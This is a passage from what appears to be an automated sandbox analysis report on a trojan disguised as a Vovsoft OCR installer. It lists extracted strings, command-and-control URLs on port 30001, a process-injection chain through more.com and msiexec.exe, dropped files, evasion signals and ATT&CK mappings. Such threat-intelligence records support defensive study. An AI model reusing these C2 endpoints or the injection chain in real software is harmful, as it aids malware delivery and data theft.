          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E58C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61:3000146.8.236.61:30001
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E58C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61:3000146.8.236.61:300011u.
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91:30001
          Source: msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91:30001/api/helper-first-register
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91:30001/api/helper-first-register?
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13ea
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91:30001MeQHYhigHTTP/1.1
          Source: iKhdG3bwZK.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: iKhdG3bwZK.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: iKhdG3bwZK.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: iKhdG3bwZK.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-codeSigning-ECC-384-R2.cer0
          Source: iKhdG3bwZK.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: iKhdG3bwZK.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: iKhdG3bwZK.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: iKhdG3bwZK.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: iKhdG3bwZK.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-codeSigning-ECC-384-R2.crl0
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/ssl.com-EVecc-RootCA.crl0
          Source: iKhdG3bwZK.exeString found in binary or memory: http://ocsp.digicert.com0
          Source: iKhdG3bwZK.exeString found in binary or memory: http://ocsp.digicert.com0A
          Source: iKhdG3bwZK.exeString found in binary or memory: http://ocsp.digicert.com0C
          Source: iKhdG3bwZK.exeString found in binary or memory: http://ocsp.digicert.com0X
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0P
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://proxyUsernameproxyUsername6R0WzU7TproxyPassword2kXPzHVWbuildVersionbuildVersion=HTTP/1.1
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://proxyUsernameproxyUsername6R0WzU7TproxyPassword2kXPzHVWbuildVersionbuildVersion=HTTP/1.1&
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E584000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://proxyUsernameproxyUsername6R0WzU7TproxyPassword2kXPzHVWbuildVersionbuildVersion=HTTP/1.1.
          Source: msiexec.exe, 00000007.00000002.2985258925.000000000E44E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://proxyUsernameproxyUsername6R0WzU7TproxyPassword2kXPzHVWbuildVersionbuildVersion=HTTP/1.1X-Api
          Source: iKhdG3bwZK.exeString found in binary or memory: http://vovsoft.com
          Source: iKhdG3bwZK.exeString found in binary or memory: http://vovsoft.com/
          Source: iKhdG3bwZK.exeString found in binary or memory: http://vovsoft.com/blog/how-to-activate-using-license-key/openU
          Source: iKhdG3bwZK.exeString found in binary or memory: http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU
          Source: iKhdG3bwZK.exeString found in binary or memory: http://vovsoft.com/help/
          Source: iKhdG3bwZK.exeString found in binary or memory: http://vovsoft.com/openU
          Source: iKhdG3bwZK.exeString found in binary or memory: http://vovsoft.comopenS
          Source: iKhdG3bwZK.exeString found in binary or memory: http://vovsoft.comopenU
          Source: iKhdG3bwZK.exeString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
          Source: iKhdG3bwZK.exeString found in binary or memory: http://www.color.org
          Source: iKhdG3bwZK.exeString found in binary or memory: http://www.digicert.com/CPS0
          Source: iKhdG3bwZK.exeString found in binary or memory: http://www.indyproject.org/
          Source: iKhdG3bwZK.exe, 00000000.00000002.1838026347.0000000006AF5000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2127296333.0000000004FA4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2983761692.0000000004E6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-ECC-384-R1.crt0
          Source: iKhdG3bwZK.exeString found in binary or memory: https://vovsoft.com/blog/credits-and-acknowledgements/open
          Source: iKhdG3bwZK.exeString found in binary or memory: https://vovsoft.com/php/ocr_download.php?lang=
          Source: iKhdG3bwZK.exeString found in binary or memory: https://vovsoft.com/translation/
          Source: iKhdG3bwZK.exeString found in binary or memory: https://vovsoft.com/translation/openU
          Source: iKhdG3bwZK.exeString found in binary or memory: https://www.google.com/search?q=openSV
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ssl.com/repository0
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeCode function: 0_2_0070AFA2 NtQuerySystemInformation,0_2_0070AFA2
          Source: iKhdG3bwZK.exeStatic PE information: invalid certificate
          Source: iKhdG3bwZK.exeStatic PE information: Number of sections : 11 > 10
          Source: iKhdG3bwZK.exe, 00000000.00000000.1732008432.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exe, 00000000.00000000.1732008432.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exe, 00000000.00000000.1732008432.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: \OriginalFileName vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exe, 00000000.00000002.1810667210.0000000004D27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exe, 00000000.00000002.1814575304.000000000508D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exe, 00000000.00000000.1732755315.00000000012DA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameocrreader.exeH vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exe, 00000000.00000002.1783137999.0000000003188000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exe, 00000000.00000002.1783957684.0000000003694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exe, 00000000.00000002.1783957684.0000000003694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exe, 00000000.00000002.1783957684.0000000003694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \OriginalFileName vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exeBinary or memory string: OriginalFilename vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exeBinary or memory string: OriginalFileName vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exeBinary or memory string: \OriginalFileName vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exeBinary or memory string: OriginalFilenameocrreader.exeH vs iKhdG3bwZK.exe
          Source: iKhdG3bwZK.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/6@0/6
          Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Roaming\dockerJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeFile created: C:\Users\user\AppData\Local\Temp\4c76ba0eJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\SysWOW64\more.comFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: iKhdG3bwZK.exeReversingLabs: Detection: 33%
          Source: iKhdG3bwZK.exeString found in binary or memory: NATS-SEFI-ADD
          Source: iKhdG3bwZK.exeString found in binary or memory: NATS-DANO-ADD
          Source: iKhdG3bwZK.exeString found in binary or memory: JIS_C6229-1984-b-add
          Source: iKhdG3bwZK.exeString found in binary or memory: jp-ocr-b-add
          Source: iKhdG3bwZK.exeString found in binary or memory: JIS_C6229-1984-hand-add
          Source: iKhdG3bwZK.exeString found in binary or memory: jp-ocr-hand-add
          Source: iKhdG3bwZK.exeString found in binary or memory: ISO_6937-2-add
          Source: iKhdG3bwZK.exeString found in binary or memory: /Add: Unexpected [%] object property in an array
          Source: iKhdG3bwZK.exeString found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
          Source: iKhdG3bwZK.exeString found in binary or memory: application/vnd.groove-help
          Source: iKhdG3bwZK.exeString found in binary or memory: "application/x-install-instructions
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeFile read: C:\Users\user\Desktop\iKhdG3bwZK.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\iKhdG3bwZK.exe "C:\Users\user\Desktop\iKhdG3bwZK.exe"
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
          Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe "C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe"
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
          Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: pla.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: pla.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\more.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32Jump to behavior
          Source: romr.1.drLNK file: ..\..\Roaming\docker\LogiAiPrompt.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: iKhdG3bwZK.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: iKhdG3bwZK.exeStatic file information: File size 21120968 > 1048576
          Source: iKhdG3bwZK.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x556000
          Source: iKhdG3bwZK.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x8c3200
          Source: iKhdG3bwZK.exeStatic PE information: More than 200 imports for user32.dll
          Source: iKhdG3bwZK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: iKhdG3bwZK.exe, 00000000.00000002.1810667210.0000000004C04000.00000004.00000020.00020000.00000000.sdmp, iKhdG3bwZK.exe, 00000000.00000002.1814575304.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000001.00000002.2127160017.0000000004C48000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2127756326.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2984685137.0000000005670000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2983556026.0000000004B04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: iKhdG3bwZK.exe, 00000000.00000002.1810667210.0000000004C04000.00000004.00000020.00020000.00000000.sdmp, iKhdG3bwZK.exe, 00000000.00000002.1814575304.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000001.00000002.2127160017.0000000004C48000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2127756326.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2984685137.0000000005670000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2983556026.0000000004B04000.00000004.00000020.00020000.00000000.sdmp
          Source: iKhdG3bwZK.exeStatic PE information: section name: .didata
          Source: yrpfhpihdypx.1.drStatic PE information: section name: .symtab
          Source: yrpfhpihdypx.1.drStatic PE information: section name: lubvlv
          Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\yrpfhpihdypxJump to dropped file
          Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\yrpfhpihdypxJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YRPFHPIHDYPX
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 30001
          Source: unknownNetwork traffic detected: HTTP traffic on port 30001 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 30001
          Source: unknownNetwork traffic detected: HTTP traffic on port 30001 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 30001
          Source: unknownNetwork traffic detected: HTTP traffic on port 30001 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 30001
          Source: unknownNetwork traffic detected: HTTP traffic on port 30001 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 30001
          Source: unknownNetwork traffic detected: HTTP traffic on port 30001 -> 49750
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeAPI/Special instruction interceptor: Address: 6CEA7C44
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeAPI/Special instruction interceptor: Address: 6CEA7945
          Source: C:\Windows\SysWOW64\more.comAPI/Special instruction interceptor: Address: 6CEA3B54
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 35BC87
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeAPI/Special instruction interceptor: Address: 6CEA7C44
          Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yrpfhpihdypxJump to dropped file
          Source: msiexec.exe, 00000007.00000002.2983411875.000000000311A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeCode function: 0_2_0070B672 mov eax, dword ptr fs:[00000030h]0_2_0070B672

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeNtSetInformationThread: Direct from: 0x70C313Jump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: 359330Jump to behavior
          Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\msiexec.exe base: 26AA008Jump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
          Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Users\user\Desktop\iKhdG3bwZK.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4c76ba0e VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\more.comQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6460e813 VolumeInformationJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000007.00000002.2986200286.000000000E52E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2986200286.000000000E544000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2986200286.000000000E540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6620, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000007.00000002.2986200286.000000000E52E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2986200286.000000000E544000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2986200286.000000000E540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6620, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter
          11
          DLL Side-Loading
          211
          Process Injection
          11
          Masquerading
          OS Credential Dumping11
          Security Software Discovery
          Remote ServicesData from Local System11
          Non-Standard Port
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Abuse Elevation Control Mechanism
          211
          Process Injection
          LSASS Memory1
          Process Discovery
          Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          Security Account Manager1
          File and Directory Discovery
          SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          DLL Side-Loading
          NTDS111
          System Information Discovery
          Distributed Component Object ModelInput Capture1
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
          Proxy
          Scheduled TransferData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          iKhdG3bwZK.exe33%ReversingLabsWin32.Trojan.Generic
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\yrpfhpihdypx100%AviraTR/Crypt.XPACK.Gen
          No Antivirus matches
